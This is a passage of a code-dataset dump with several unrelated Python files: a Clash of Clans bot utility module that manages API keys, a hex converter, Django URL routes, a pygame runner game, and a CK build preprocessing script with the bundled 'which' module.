self.ranking_history: collection_class = client.ranking_history\n self.player_trophies: collection_class = self.ranking_history.player_trophies\n self.player_versus_trophies: collection_class = self.ranking_history.player_versus_trophies\n self.clan_trophies: collection_class = self.ranking_history.clan_trophies\n self.clan_versus_trophies: collection_class = self.ranking_history.clan_versus_trophies\n self.capital_trophies: collection_class = self.ranking_history.capital\n self.basic_clan: collection_class = self.looper.clan_tags\n\ndb_client = DBClient()\n\n\nasync def get_players(tags: list, use_cache=True):\n players = []\n tag_set = set(tags)\n\n if use_cache:\n cache_data = await redis.mget(keys=list(tag_set))\n else:\n cache_data = []\n\n for data in cache_data:\n if data is None:\n continue\n data = ujson.loads(data)\n tag_set.remove(data.get(\"tag\"))\n player = coc.Player(data=data, client=coc_client)\n players.append(player)\n\n tasks = []\n for tag in tag_set:\n task = asyncio.ensure_future(coc_client.get_player(tag))\n tasks.append(task)\n if tasks:\n responses = await asyncio.gather(*tasks, return_exceptions=True)\n for response in responses:\n if isinstance(response, coc.Player):\n players.append(response)\n return players\n\n\nasync def download_image(url: str):\n cached = IMAGE_CACHE.get(url)\n if cached is None:\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as response:\n image_data = await response.read()\n await session.close()\n image_bytes: bytes = image_data\n IMAGE_CACHE.ttl(url, image_bytes, 3600 * 4)\n else:\n image_bytes = cached\n return io.BytesIO(image_bytes)\n\ndef fix_tag(tag:str):\n tag = tag.replace('%23', '')\n tag = \"#\" + re.sub(r\"[^A-Z0-9]+\", \"\", tag.upper()).replace(\"O\", \"0\")\n return tag\n\ndef gen_season_date():\n end = coc.utils.get_season_end().replace(tzinfo=utc).date()\n month = end.month\n if end.month <= 9:\n month = f\"0{month}\"\n return f\"{end.year}-{month}\"\n\ndef gen_games_season():\n now = datetime.utcnow()\n month = now.month\n if month <= 9:\n month = f\"0{month}\"\n return f\"{now.year}-{month}\"\n\ndef gen_raid_date():\n now = datetime.utcnow().replace(tzinfo=utc)\n current_dayofweek = now.weekday()\n if (current_dayofweek == 4 and now.hour >= 7) or (current_dayofweek == 5) or (current_dayofweek == 6) or (\n current_dayofweek == 0 and now.hour < 7):\n if current_dayofweek == 0:\n current_dayofweek = 7\n fallback = current_dayofweek - 4\n raidDate = (now - timedelta(fallback)).date()\n return str(raidDate)\n else:\n forward = 4 - current_dayofweek\n raidDate = (now + timedelta(forward)).date()\n return str(raidDate)\n\nasync def token_verify(server_id: int, api_token: str, only_admin: bool = False):\n if api_token is None:\n raise HTTPException(status_code=403, detail=\"API Token is required\")\n server_lookup = [1103679645439754335]\n if not only_admin:\n server_lookup.append(server_id)\n results = await db_client.server_db.find({\"server\" : {\"$in\" : [server_id, 1103679645439754335]}}).to_list(length=None)\n tokens = [r.get(\"ck_api_token\") for r in results]\n if api_token not in tokens:\n raise HTTPException(status_code=403, detail=\"Invalid API token or cannot access this resource\")\n\nasync def get_keys(emails: list, passwords: list, key_names: str, key_count: int):\n total_keys = []\n\n for count, email in enumerate(emails):\n _keys = []\n password = passwords[count]\n\n session = aiohttp.ClientSession()\n\n body = {\"email\": email, \"password\": password}\n resp = await session.post(\"https://developer.clashofclans.com/api/login\", json=body)\n if resp.status == 403:\n raise RuntimeError(\n \"Invalid Credentials\"\n )\n\n resp_paylaod = await resp.json()\n ip = json_loads(base64_b64decode(resp_paylaod[\"temporaryAPIToken\"].split(\".\")[1] + \"====\").decode(\"utf-8\"))[\n \"limits\"][1][\"cidrs\"][0].split(\"/\")[0]\n\n resp = await session.post(\"https://developer.clashofclans.com/api/apikey/list\")\n keys = (await resp.json())[\"keys\"]\n _keys.extend(key[\"key\"] for key in keys if key[\"name\"] == key_names and ip in key[\"cidrRanges\"])\n\n for key in (k for k in keys if ip not in k[\"cidrRanges\"]):\n await session.post(\"https://developer.clashofclans.com/api/apikey/revoke\", json={\"id\": key[\"id\"]})\n\n print(len(_keys))\n while len(_keys) < key_count:\n data = {\n \"name\": key_names,\n \"description\": \"Created on {}\".format(datetime.now().strftime(\"%c\")),\n \"cidrRanges\": [ip],\n \"scopes\": [\"clash\"],\n }\n resp = await session.post(\"https://developer.clashofclans.com/api/apikey/create\", json=data)\n key = await resp.json()\n _keys.append(key[\"key\"][\"key\"])\n\n if len(keys) == 10 and len(_keys) < key_count:\n print(\"%s keys were requested to be used, but a maximum of %s could be \"\n \"found/made on the developer site, as it has a maximum of 10 keys per account. \"\n \"Please delete some keys or lower your `key_count` level.\"\n \"I will use %s keys for the life of this client.\", )\n\n if len(_keys) == 0:\n raise RuntimeError(\n \"There are {} API keys already created and none match a key_name of '{}'.\"\n \"Please specify a key_name kwarg, or go to 'https://developer.clashofclans.com' to delete \"\n \"unused keys.\".format(len(keys), key_names)\n )\n\n await session.close()\n for k in _keys:\n total_keys.append(k)\n\n print(len(total_keys))\n return (total_keys)\n\n\ndef create_keys(emails: list, passwords: list):\n done = False\n global API_KEYS\n while done is False:\n try:\n loop = asyncio.get_event_loop()\n keys = loop.run_until_complete(get_keys(emails=emails,\n passwords=passwords, key_names=\"test\", key_count=10))\n done = True\n\n return keys\n except Exception as e:\n print(e)\n\n\n\n\nleagues = [\"Legend League\", \"Titan League I\" , \"Titan League II\" , \"Titan League III\" ,\"Champion League I\", \"Champion League II\", \"Champion League III\",\n \"Master League I\", \"Master League II\", \"Master League III\",\n \"Crystal League I\",\"Crystal League II\", \"Crystal League III\",\n \"Gold League I\",\"Gold League II\", \"Gold League III\",\n \"Silver League I\",\"Silver League II\",\"Silver League III\",\n \"Bronze League I\", \"Bronze League II\", \"Bronze League III\", \"Unranked\"]","repo_name":"MagicTheDev/ClashKing","sub_path":"API/APIUtils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10086,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"54"} +{"seq_id":"70583372643","text":"def hexadecimalToDecimal(hexnum):\r\n length = len(hexnum)\r\n base = 1\r\n dec_val = 0\r\n for i in range(length - 1, -1, -1):\r\n if hexnum[i] >= '0' and hexnum[i] <= '9':\r\n dec_val += (ord(hexnum[i]) - 48) * base\r\n base = base * 16\r\n elif hexnum[i] >= 'A' and hexnum[i] <= 'F':\r\n dec_val += (ord(hexnum[i]) - 55) * base\r\n base = base * 16\r\n return dec_val \r\n \r\n# Driver code\r\nif __name__ == '__main__': \r\n hexnum = input(\"Enter a Hexadecimal Value: \")\r\n print(hexnum,\":\",hexadecimalToDecimal(hexnum))\r\n","repo_name":"UTSAVS26/Python-Basics-1","sub_path":"hex_dec.py","file_name":"hex_dec.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"763496085","text":"from django.conf.urls import url\nfrom .views import (ProfileDetailView, ProfileEditView, SocialLinkCreateView, SocialLinkUpdateView,\n SocialLinkDeleteView, RegisterView, RegisterSuccessView, AccountActivationView, get_activation_link)\n\napp_name = 'oauth'\n\nurlpatterns = [\n url(r'^register/$', RegisterView.as_view(), name='register'),\n url(r'^register-success/$', RegisterSuccessView.as_view(), name='register-success'),\n url(r'^(?P[\\w]+)/get/$', get_activation_link, name='get-act-link'),\n url(r'^activate/(?P[0-9A-Za-z_\\-]+)/(?P[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',\n AccountActivationView.as_view(), name='activate'),\n url(r'^sociallink/add/$', SocialLinkCreateView.as_view(), name='link-add'),\n url(r'^(?P[\\w]+)/$', ProfileDetailView.as_view(), name='detail'),\n url(r'^(?P[\\w]+)/edit/$', ProfileEditView.as_view(), name='edit'),\n url(r'sociallink/(?P[\\w.-]+)-(?P[\\w]{2})/$', SocialLinkUpdateView.as_view(),\n name='link-edit'),\n url(r'sociallink/(?P[\\w.-]+)-(?P[\\w]{2})/delete/$', SocialLinkDeleteView.as_view(),\n name='link-delete'),\n]\n","repo_name":"ajatprabha/gymkhana","sub_path":"src/oauth/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"23260477192","text":"import pygame, sys\nfrom random import randint, choice\n\nclass Player(pygame.sprite.Sprite):\n\n def __init__(self):\n\n super().__init__()\n\n player_walk_1 = pygame.image.load('./static/graphics/player/player_walk_1.png').convert_alpha()\n\n player_walk_2 = pygame.image.load('./static/graphics/player/player_walk_2.png').convert_alpha()\n\n self.player_walk = [player_walk_1, player_walk_2]\n\n self.player_index = 0\n\n self.player_jump = pygame.image.load('./static/graphics/player/jump.png').convert_alpha()\n\n self.image = self.player_walk[self.player_index]\n\n self.rect = self.image.get_rect(midbottom = (80, 300))\n\n self.gravity = 0\n\n self.jump_sound = pygame.mixer.Sound('./static/audio/jump.mp3')\n\n self.jump_sound.set_volume(0.5)\n\n def player_input(self):\n\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_SPACE] and self.rect.bottom >= 300:\n\n self.gravity = -20\n\n self.jump_sound.play()\n\n def apply_gravity(self):\n\n self.gravity += 1\n\n self.rect.y += self.gravity\n\n if self.rect.bottom >= 300:\n\n self.rect.bottom = 300\n\n def animation_state(self):\n\n if self.rect.bottom < 300:\n\n self.image = self.player_jump\n\n else:\n\n self.player_index += 0.1\n\n if self.player_index >= len(self.player_walk):\n\n self.player_index = 0\n\n self.image = self.player_walk[int(self.player_index)]\n\n def update(self):\n\n self.player_input()\n\n self.apply_gravity()\n\n self.animation_state()\n\nclass Obstacle(pygame.sprite.Sprite):\n\n def __init__(self, type):\n\n super().__init__()\n\n if type == 'fly':\n\n fly_1 = pygame.image.load('./static/graphics/fly/fly1.png').convert_alpha() \n\n fly_2 = pygame.image.load('./static/graphics/fly/fly2.png').convert_alpha()\n\n self.frames = [fly_1, fly_2]\n\n y_pos = 210\n\n else:\n\n snail_1 = pygame.image.load('./static/graphics/snail/snail1.png').convert_alpha() \n\n snail_2 = pygame.image.load('./static/graphics/snail/snail2.png').convert_alpha()\n\n self.frames = [snail_1, snail_2]\n\n y_pos = 300 \n\n self.animation_index = 0\n \n self.image = self.frames[self.animation_index]\n \n self.rect = self.image.get_rect(midbottom = (randint(900, 1100), y_pos))\n\n def animation_state(self):\n\n self.animation_index += 0.1\n\n if self.animation_index >= len(self.frames):\n\n self.animation_index = 0\n \n self.image = self.frames[int(self.animation_index)]\n\n def update(self):\n\n self.animation_state()\n\n self.rect.x -= 6\n\n self.destroy()\n\n def destroy(self):\n\n if self.rect.x <= -100:\n \n self.kill()\n\ndef display_score():\n\n current_time = int(pygame.time.get_ticks() / 1000) - start_time\n\n score_surface = text_font.render(f'Score: {current_time}', False, (64, 64, 64, 64))\n\n score_rectangle = score_surface.get_rect(center = (400, 50))\n\n screen.blit(score_surface, score_rectangle)\n\n return current_time\n\ndef collision_sprite():\n\n if pygame.sprite.spritecollide(player.sprite, obstacle_group, False):\n\n obstacle_group.empty()\n\n return False\n \n else:\n\n return True\n\n# start pygame \n\npygame.init()\n\n# display surface\n\nscreen = pygame.display.set_mode((800, 400))\n\n# set title for a window\n\npygame.display.set_caption('Runner')\n\n# initialize clock to control framerate\n\nclock = pygame.time.Clock()\n\n# create sky and ground surfaces\n\nsky_surface = pygame.image.load('./static/graphics/sky.png').convert_alpha()\n\nground_surface = pygame.image.load('./static/graphics/ground.png').convert_alpha()\n\n# create a font surface \n\ntext_font = pygame.font.Font('./static/font/Pixeltype.ttf', 50)\n\n# Intro screen\n\nplayer_stand = pygame.image.load('./static/graphics/player/player_stand.png').convert_alpha()\n\nplayer_stand= pygame.transform.rotozoom(player_stand, 0, 2)\n\nplayer_stand_rectangle = player_stand.get_rect(center = (400, 200))\n\ngame_name = text_font.render('Pixel Runner', False, (111, 196, 169))\n\ngame_name_rectangle = game_name.get_rect(center = (400, 80))\n\n# messages \n\ngame_message = text_font.render('Press space to run', False, (111, 196, 169))\n\ngame_message_rectangle = game_message.get_rect(center = (400, 320))\n\n# activate game \n\ngame_active = False\n\n# start time counter \n\nstart_time = 0\n\n# set score \n\nscore = 0\n\n# set obstacle timer\n\nobstacle_timer = pygame.USEREVENT + 1\n\npygame.time.set_timer(obstacle_timer, 1500)\n\nsnail_animation_timer = pygame.USEREVENT + 2\n\npygame.time.set_timer(snail_animation_timer, 500)\n\nfly_animation_timer = pygame.USEREVENT + 3\n\npygame.time.set_timer(fly_animation_timer, 200)\n\n# background music \n\nbackground_music = pygame.mixer.Sound('./static/audio/music.wav')\n\nbackground_music.play(loops = -1)\n\n# groups \n\nplayer = pygame.sprite.GroupSingle()\n\nplayer.add(Player())\n\nobstacle_group = pygame.sprite.Group()\n\n# infinite loop to keep display running \n\nwhile True:\n\n # check for event\n\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n\n pygame.quit()\n\n sys.exit()\n\n if game_active:\n\n if event.type == obstacle_timer:\n\n obstacle_group.add(Obstacle(choice(['fly', 'snai', 'snail', 'snail'])))\n\n else:\n\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n\n game_active = True\n\n start_time = int(pygame.time.get_ticks() / 1000)\n \n if game_active:\n\n # attach surfaces\n\n screen.blit(sky_surface, (0, 0))\n\n screen.blit(ground_surface, (0, 300))\n\n # get the score \n\n score = display_score()\n\n player.draw(screen)\n\n player.update()\n\n obstacle_group.draw(screen)\n\n obstacle_group.update()\n\n # collision \n\n game_active = collision_sprite()\n\n else:\n\n screen.fill((94, 129, 162))\n\n # manage player and obstacle position\n\n screen.blit(player_stand, player_stand_rectangle)\n\n screen.blit(game_name, game_name_rectangle)\n\n # score \n\n score_message = text_font.render(f'Your score: {score}', False, (111, 196, 169))\n\n score_message_rectangle = score_message.get_rect(center = (400, 330))\n\n if score == 0:\n\n screen.blit(game_message, game_message_rectangle)\n\n else:\n\n screen.blit(score_message, score_message_rectangle)\n\n # update frame\n\n pygame.display.update()\n\n # while loop will not run more than 60 times per second\n\n clock.tick(60)\n","repo_name":"faridisayev/Python-Runner-Game","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11473849322","text":"import sys\r\nimport os\r\n\r\nAPP_CONF_FILE = 'app.conf'\r\nCAFFE_ENGINE = 'caffe'\r\nTF_ENGINE = 'tf'\r\n\r\ndef ck_preprocess(i):\r\n if sys.version_info[0]>2:\r\n import configparser as cp\r\n else:\r\n import ConfigParser as cp\r\n\r\n # read existing desktop app config, if any\r\n conf = cp.ConfigParser()\r\n conf.read(APP_CONF_FILE)\r\n\r\n ck = i['ck_kernel']\r\n\r\n r = fill_general(ck, conf, i.get('params', {}))\r\n if r['return'] > 0: return r\r\n\r\n r = fill_models(ck, conf, 'Models', tags='caffemodel', exclude_tags=['ssd'], engine=CAFFE_ENGINE)\r\n if r['return'] > 0: return r\r\n\r\n r = fill_models(ck, conf, 'DetectionModels', 'caffemodel,ssd', engine=CAFFE_ENGINE)\r\n if r['return'] > 0: return r\r\n\r\n r = fill_models(ck, conf, 'DetectionModels', 'model,tensorflow,squeezedetmodel', engine=TF_ENGINE, start_count=len(r['lst']))\r\n if r['return'] > 0: return r\r\n\r\n host_os_dict = i.get('host_os_dict', {})\r\n host_os = host_os_dict.get('ck_name', '')\r\n exe_extension = ''\r\n if 'win' == host_os:\r\n exe_extension = '.exe'\r\n\r\n r = fill_programs(ck, conf, exe_extension, 'Programs', 'caffe-classification,continuous')\r\n if r['return'] > 0: return r\r\n\r\n r = fill_programs(ck, conf, exe_extension, 'DetectionPrograms', 'caffe-detection,continuous')\r\n if r['return'] > 0: return r\r\n\r\n r = fill_squeezedet(ck, conf, 'DetectionPrograms', start_count=len(r['lst']))\r\n if r['return'] > 0: return r\r\n\r\n r = fill_aux(ck, conf)\r\n if r['return'] > 0: return r\r\n\r\n r = fill_val(ck, conf, 'VAL', 'imagenet,val')\r\n if r['return'] > 0: return r\r\n\r\n r = fill_val(ck, conf, 'DetectionDatasets', 'object-detection,images')\r\n if r['return'] > 0: return r\r\n\r\n with open(APP_CONF_FILE, 'w') as f:\r\n conf.write(f)\r\n\r\n bat = ''\r\n if 'win' != host_os:\r\n misc = i.get('misc', {})\r\n path = misc.get('path', '')\r\n tmp_dir = misc.get('tmp_dir', '')\r\n if '' != path:\r\n ld_path = os.path.join(path, tmp_dir)\r\n bat ='export ' + host_os_dict.get('env_ld_library_path', 'LD_LIBRARY_PATH') +'=\"' + ld_path + '\"'\r\n\r\n return {'return':0, 'bat': bat, 'new_env': i['env']}\r\n\r\ndef setstr(conf, section, key, value):\r\n # string values must be enquoted for Qt to read them correctly\r\n conf.set(section, key, '\"' + value.replace('\\\\', '\\\\\\\\') + '\"')\r\n\r\ndef ensure_section(conf, section, clean=False):\r\n if clean:\r\n conf.remove_section(section)\r\n if not conf.has_section(section):\r\n conf.add_section(section)\r\n\r\ndef conf_set_from_params(conf, section, params, param_names):\r\n for param_name in param_names:\r\n if param_name in params:\r\n conf.set(section, param_name, str(params[param_name]))\r\n\r\ndef fill_general(ck, conf, params):\r\n section = 'General'\r\n ensure_section(conf, section)\r\n try:\r\n bin_path, bin_name = os.path.split(which('ck'))\r\n setstr(conf, section, 'ck_bin_path', bin_path)\r\n setstr(conf, section, 'ck_exe_name', bin_name)\r\n except WhichError:\r\n return {'return':1, 'error': 'Path to ck not found'}\r\n\r\n r = ck.access({'action': 'where', 'module_uoa': 'repo', 'data_uoa': 'local'})\r\n if r['return'] > 0: return r\r\n\r\n setstr(conf, section, 'ck_repos_path', os.path.dirname(r['path']))\r\n\r\n conf_set_from_params(conf, section, params, [\r\n 'fps_update_interval_ms',\r\n 'recognition_update_interval_ms',\r\n 'footer_right_text',\r\n 'footer_right_url',\r\n 'recognition_auto_restart'\r\n ])\r\n\r\n return {'return':0}\r\n\r\ndef meta_contain_tag(u, tags_to_check):\r\n utags = u.get('meta', {}).get('tags', [])\r\n for t in tags_to_check:\r\n if t in utags:\r\n return True\r\n return False\r\n\r\ndef find_by_tags(ck, tags, module='', exclude_tags=[]):\r\n search_dict = {'action': 'search', 'tags': tags, 'add_meta': 'yes'}\r\n if module != '':\r\n search_dict['module_uoa'] = module\r\n r = ck.access(search_dict)\r\n if r['return'] > 0: return r\r\n\r\n lst = [x for x in r['lst'] if not meta_contain_tag(x, exclude_tags)]\r\n\r\n for i, u in enumerate(lst):\r\n module_uoa = u['module_uoa']\r\n data_uoa = u['data_uoa']\r\n r = ck.access({'action': 'load', 'module_uoa': module_uoa, 'data_uoa': data_uoa})\r\n if r['return'] > 0: return r\r\n u['meta'] = r['dict']\r\n u['data_name'] = r['data_name']\r\n\r\n return {'return':0, 'lst': lst}\r\n\r\ndef fill_section(ck, conf, section, tags, module='', exclude_tags=[], start_count=0):\r\n r = find_by_tags(ck, tags=tags, module=module, exclude_tags=exclude_tags)\r\n if r['return'] > 0: return r\r\n\r\n ensure_section(conf, section, 0 == start_count)\r\n\r\n lst = r['lst']\r\n conf.set(section, 'count', str(len(lst) + start_count))\r\n\r\n for i, u in enumerate(lst):\r\n setstr(conf, section, str(i + start_count) + '_uoa', u['data_uoa'])\r\n setstr(conf, section, str(i + start_count) + '_name', u['data_name'])\r\n\r\n return {'return':0, 'lst': lst}\r\n\r\ndef fill_models(ck, conf, section, tags, exclude_tags=[], engine='', start_count=0):\r\n r = fill_section(ck, conf, section=section, tags=tags, module='env', exclude_tags=exclude_tags, start_count=start_count)\r\n if r['return'] > 0: return r\r\n\r\n lst = r['lst']\r\n for i, u in enumerate(lst):\r\n i = i + start_count\r\n setstr(conf, section, str(i) + '_engine', engine)\r\n\r\n return {'return':0, 'lst': lst}\r\n\r\ndef fill_programs(ck, conf, exe_extension, section, tags):\r\n import glob\r\n\r\n r = fill_section(ck, conf, section=section, tags=tags)\r\n if r['return'] > 0: return r\r\n lst = r['lst']\r\n for i, u in enumerate(lst):\r\n output_file = ck.get_by_flat_key({'dict': u, 'key': '##meta#run_cmds#use_continuous#run_time#run_cmd_out1'}).get('value', None)\r\n if not output_file:\r\n print('! Could not find output file for ' + u['data_uoa'])\r\n continue\r\n\r\n target_file = ck.get_by_flat_key({'dict': u, 'key': '##meta#target_file'}).get('value', None)\r\n if not target_file:\r\n print('! Could not find target file for ' + u['data_uoa'])\r\n continue\r\n\r\n if not target_file.endswith(exe_extension):\r\n target_file = target_file + exe_extension\r\n\r\n r = ck.access(['find', '--module_uoa=' + u['module_uoa'], '--data_uoa=' + u['data_uoa']])\r\n if r['return'] != 0:\r\n print('! Could not load program ' + u['data_uoa'] + ': ' + r['error'])\r\n continue\r\n\r\n program_path = r['path']\r\n is_webcam = 'webcam' in u.get('meta', {}).get('tags', [])\r\n\r\n target_dirs = glob.glob(os.path.join(program_path, 'tmp*'))\r\n if not target_dirs:\r\n print('! Program \"' + u['data_uoa'] + '\" is not compiled. For use it in desktop demo, please compile it first')\r\n continue\r\n\r\n target_paths = []\r\n target_names = []\r\n target_uoas = []\r\n\r\n for target_path in target_dirs:\r\n full_target_path = os.path.join(program_path, target_path)\r\n r = ck.load_json_file({'json_file': os.path.join(full_target_path, 'tmp-deps.json')})\r\n if r['return'] != 0:\r\n print('! Failed to load tmp-deps.json from ' + full_target_path + ': ' + r['error'])\r\n continue\r\n\r\n target_uoa = ck.get_by_flat_key({'dict': r['dict'], 'key': '##lib-caffe#uoa'}).get('value', None)\r\n if not target_uoa:\r\n print('! Not found Caffe lib env UOA for ' + full_target_path)\r\n continue\r\n\r\n target_caffe_name = ck.get_by_flat_key({'dict': r['dict'], 'key': '##lib-caffe#dict#data_name'}).get('value', None)\r\n if not target_caffe_name:\r\n print('! Not found Caffe lib data_name for ' + full_target_path)\r\n continue\r\n\r\n if target_caffe_name in target_names:\r\n print('! Duplicate Caffe lib \"' + target_caffe_name + '\", skipping directory ' + full_target_path)\r\n continue\r\n\r\n target_names.append(target_caffe_name)\r\n target_paths.append(os.path.basename(target_path))\r\n target_uoas.append(target_uoa)\r\n\r\n if not target_paths:\r\n print('! Program \"' + u['data_uoa'] + '\" is not compiled. For use it in desktop demo, please compile it first')\r\n continue\r\n\r\n setstr(conf, section, str(i) + '_path', program_path)\r\n setstr(conf, section, str(i) + '_output_file', output_file)\r\n setstr(conf, section, str(i) + '_exe', target_file)\r\n setstr(conf, section, str(i) + '_engine', CAFFE_ENGINE)\r\n conf.set(section, str(i) + '_webcam', str(1 if is_webcam else 0))\r\n\r\n conf.set(section, str(i) + '_target_count', str(len(target_paths)))\r\n for j, target_path in enumerate(target_paths):\r\n k = str(i) + '_target_' + str(j)\r\n setstr(conf, section, k + '_path', target_path)\r\n setstr(conf, section, k + '_name', target_names[j])\r\n setstr(conf, section, k + '_uoa', target_uoas[j])\r\n\r\n return {'return': 0, 'lst': lst}\r\n\r\ndef fill_aux(ck, conf):\r\n section = 'AUX'\r\n r = fill_section(ck, conf, section=section, tags='imagenet,aux', module='env')\r\n if r['return'] > 0: return r\r\n lst = r['lst']\r\n for i, u in enumerate(lst):\r\n package_uoa = u.get('meta', {}).get('package_uoa', '')\r\n if package_uoa == '':\r\n print('! There is no package_uoa for AUX env entry ' + u['data_uoa'])\r\n setstr(conf, section, str(i) + '_package_uoa', package_uoa)\r\n return {'return': 0}\r\n\r\ndef fill_val(ck, conf, section, tags):\r\n r = fill_section(ck, conf, section=section, tags=tags, module='env')\r\n if r['return'] > 0: return r\r\n lst = r['lst']\r\n for i, u in enumerate(lst):\r\n package_uoa = u.get('meta', {}).get('package_uoa', '')\r\n r = {}\r\n if package_uoa == '':\r\n print('! There is no package_uoa for VAL env entry ' + u['data_uoa'])\r\n else:\r\n r = ck.access({'action': 'load', 'module_uoa': 'package', 'data_uoa': package_uoa})\r\n setstr(conf, section, str(i) + '_name', r.get('data_name', ''))\r\n setstr(conf, section, str(i) + '_aux_package_uoa', r.get('dict', {}).get('aux_uoa', ''))\r\n return {'return': 0}\r\n\r\ndef fill_squeezedet(ck, conf, section, start_count):\r\n r = fill_section(ck, conf, section=section, tags='tensorflow,squeezedet,continuous', start_count=start_count)\r\n if r['return'] > 0: return r\r\n lst = r['lst']\r\n for i, u in enumerate(lst):\r\n i = i + start_count\r\n output_file = ck.get_by_flat_key({'dict': u, 'key': '##meta#run_cmds#use_continuous#run_time#run_cmd_out1'}).get('value', None)\r\n if None == output_file:\r\n print('! Could not find output file for ' + u['data_uoa'])\r\n else:\r\n setstr(conf, section, str(i) + '_output_file', output_file)\r\n setstr(conf, section, str(i) + '_exe', 'continuous.sh')\r\n\r\n r = ck.access(['find', '--module_uoa=' + u['module_uoa'], '--data_uoa=' + u['data_uoa']])\r\n if r['return'] != 0:\r\n print('! Could not load program ' + u['data_uoa'] + ': ' + r['error'])\r\n continue\r\n\r\n program_path = r['path']\r\n is_webcam = 'webcam' in u.get('meta', {}).get('tags', [])\r\n \r\n setstr(conf, section, str(i) + '_path', program_path)\r\n setstr(conf, section, str(i) + '_engine', TF_ENGINE)\r\n conf.set(section, str(i) + '_webcam', str(1 if is_webcam else 0))\r\n\r\n r = find_by_tags(ck, tags='lib,tensorflow', module='env')\r\n if r['return'] > 0: return r\r\n\r\n lst = r['lst']\r\n conf.set(section, str(i) + '_target_count', str(len(lst)))\r\n for j, u in enumerate(lst):\r\n k = str(i) + '_target_' + str(j)\r\n target = lst[j]\r\n setstr(conf, section, k + '_path', 'tmp')\r\n setstr(conf, section, k + '_name', target['data_name'])\r\n setstr(conf, section, k + '_uoa', target['data_uoa'])\r\n\r\n return {'return': 0}\r\n\r\n#\r\n# =============================================================================\r\n#\r\n\r\n# Copyright (c) 2002-2007 ActiveState Software Inc.\r\n# Author:\r\n# Trent Mick (TrentM@ActiveState.com)\r\n# Home:\r\n# http://trentm.com/projects/which/\r\n# \r\n# LICENSE: MIT\r\n# \r\n# Copyright (c) 2002-2005 ActiveState Corp.\r\n# \r\n# Permission is hereby granted, free of charge, to any person obtaining a\r\n# copy of this software and associated documentation files (the\r\n# \"Software\"), to deal in the Software without restriction, including\r\n# without limitation the rights to use, copy, modify, merge, publish,\r\n# distribute, sublicense, and/or sell copies of the Software, and to\r\n# permit persons to whom the Software is furnished to do so, subject to\r\n# the following conditions:\r\n# \r\n# The above copyright notice and this permission notice shall be included\r\n# in all copies or substantial portions of the Software.\r\n# \r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\r\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\r\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\r\n# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\r\n# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\r\n# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\r\n# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n# \r\n\r\nimport getopt\r\nimport stat\r\n\r\n#---- exceptions\r\n\r\nclass WhichError(Exception):\r\n pass\r\n\r\n#---- internal support stuff\r\n\r\ndef _getRegisteredExecutable(exeName):\r\n \"\"\"Windows allow application paths to be registered in the registry.\"\"\"\r\n registered = None\r\n if sys.platform.startswith('win'):\r\n if os.path.splitext(exeName)[1].lower() != '.exe':\r\n exeName += '.exe'\r\n import _winreg\r\n try:\r\n key = \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths\\\\\" +\\\r\n exeName\r\n value = _winreg.QueryValue(_winreg.HKEY_LOCAL_MACHINE, key)\r\n registered = (value, \"from HKLM\\\\\"+key)\r\n except _winreg.error:\r\n pass\r\n if registered and not os.path.exists(registered[0]):\r\n registered = None\r\n return registered\r\n\r\ndef _samefile(fname1, fname2):\r\n if sys.platform.startswith('win'):\r\n return ( os.path.normpath(os.path.normcase(fname1)) ==\\\r\n os.path.normpath(os.path.normcase(fname2)) )\r\n else:\r\n return os.path.samefile(fname1, fname2)\r\n\r\ndef _cull(potential, matches, verbose=0):\r\n \"\"\"Cull inappropriate matches. Possible reasons:\r\n - a duplicate of a previous match\r\n - not a disk file\r\n - not executable (non-Windows)\r\n If 'potential' is approved it is returned and added to 'matches'.\r\n Otherwise, None is returned.\r\n \"\"\"\r\n for match in matches: # don't yield duplicates\r\n if _samefile(potential[0], match[0]):\r\n if verbose:\r\n sys.stderr.write(\"duplicate: %s (%s)\\n\" % potential)\r\n return None\r\n else:\r\n if not stat.S_ISREG(os.stat(potential[0]).st_mode):\r\n if verbose:\r\n sys.stderr.write(\"not a regular file: %s (%s)\\n\" % potential)\r\n elif sys.platform != \"win32\" \\\r\n and not os.access(potential[0], os.X_OK):\r\n if verbose:\r\n sys.stderr.write(\"no executable access: %s (%s)\\n\"\\\r\n % potential)\r\n else:\r\n matches.append(potential)\r\n return potential\r\n\r\n#---- module API\r\n\r\ndef whichgen(command, path=None, verbose=0, exts=None):\r\n \"\"\"Return a generator of full paths to the given command.\r\n \r\n \"command\" is a the name of the executable to search for.\r\n \"path\" is an optional alternate path list to search. The default it\r\n to use the PATH environment variable.\r\n \"verbose\", if true, will cause a 2-tuple to be returned for each\r\n match. The second element is a textual description of where the\r\n match was found.\r\n \"exts\" optionally allows one to specify a list of extensions to use\r\n instead of the standard list for this system. This can\r\n effectively be used as an optimization to, for example, avoid\r\n stat's of \"foo.vbs\" when searching for \"foo\" and you know it is\r\n not a VisualBasic script but \".vbs\" is on PATHEXT. This option\r\n is only supported on Windows.\r\n\r\n This method returns a generator which yields either full paths to\r\n the given command or, if verbose, tuples of the form (, ).\r\n \"\"\"\r\n matches = []\r\n if path is None:\r\n usingGivenPath = 0\r\n path = 